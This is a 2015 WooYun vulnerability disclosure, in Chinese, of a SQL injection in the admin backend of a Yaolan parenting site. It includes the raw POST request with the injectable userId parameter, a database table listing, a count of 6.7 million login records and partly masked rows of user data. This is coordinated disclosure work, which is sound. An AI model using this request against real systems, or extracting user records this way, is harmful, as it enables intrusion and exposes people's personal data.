当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118883

漏洞标题:摇篮网某站点MySQL注射(涉及大量用户数据)

相关厂商:摇篮网

漏洞作者: lijiejie

提交时间:2015-06-07 21:26

修复时间:2015-07-23 17:22

公开时间:2015-07-23 17:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-07: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

摇篮网某站点MySQL注射(674万用户数据可拖库),库中包含用户密码,邮箱,手机号,QQ等资料

详细说明:

注射点在后台http://jifen.yaolan.com/admin.php?r=site/login:

POST /admin.php?r=site/GetUserCoin HTTP/1.1
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jifen.yaolan.com
Cookie: PHPSESSID=eqffbvsjk3ardoggo834p3g3v5
Host: jifen.yaolan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
userId=*

漏洞证明:

current user:    'userweb@%'
current database: 'user_yaolan_com'
Database: user_yaolan_com
[31 tables]
+-------------------------+
| BoroughList |
| ChildInfo |
| ChildInterestDetailList |
| ChildInterestInfo |
| ChildInterestList |
| CityList |
| CoinInfo |
| CountryList |
| EducationList |
| GeekList |
| GradeList |
| IncomeList |
| LoginInfo |
| MarkInfo |
| NoDefaultChildInfo |
| ProfessionList |
| ProvinceList |
| TradeList |
| UserBaseInfo |
| UserExtInfo |
| UserGeekDetail |
| UserInterestDetailList |
| UserInterestInfo |
| UserInterestList |
| UserSignature |
| UserSource |
| UserVerifyDetail |
| VerifyList |
| iur_child_birth_based |
| sysdiagrams |
| word_filter_reg |
+-------------------------+
Database: user_yaolan_com
+-----------+---------+
| Table | Entries |
+-----------+---------+
| LoginInfo | 6741020 |
+-----------+---------+


LoginInfo表中包括用户密码, UserBaseInfo和UserExtInfo两个表则包含用户的个人资料,邮箱手机号,QQ号码,地址等:
尝试取100万到1000010这10条记录,如下:

mask 区域
*****Bind,ModifiedDate,MSN,NickNameLastModifiedTime,PostalAd*****
*****ot;,"NULL","NULL","NULL","163002","0&qu*****
*****0","NULL","NULL","NULL","NULL","*****
*****","NULL","NULL","NULL","317000",&quot*****
*****0","NULL","NULL","NULL","NULL","*****
*****ot;,"NULL","NULL","NULL","100091","0&q*****
*****0","NULL","NULL","NULL","NULL","0*****
*****00","NULL","NULL","NULL","510650",&quot*****
*****00","NULL","NULL","NULL","NULL","*****
*****00","NULL","NULL","NULL","NULL",&quot*****
*****;,"NULL","NULL","NULL","466200","0&quot*****
**********
*****d,RegDate,RegIp,ResetP*****
*****6c16b2","2003-10-10 14:00:49",&qu*****
*****f81dc7","2003-10-16 10:34:23",&qu*****
*****9efbae","2005-03-23 16:50:43",&qu*****
*****421f50","2003-11-11 15:32:21",&qu*****
*****3f09b9","2003-10-31 18:34:07",&qu*****
*****2f806b","2004-02-02 16:48:05",&qu*****
*****54db06","2003-10-27 08:31:31",&qu*****
*****06c118","2004-06-07 11:01:28",&qu*****
*****4a1a6e","2004-04-27 14:12:17",&qu*****
*****cod*****


修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-08 17:21

厂商回复:

漏洞确认,正在修复。感谢乌云白帽子提醒。

最新状态:

暂无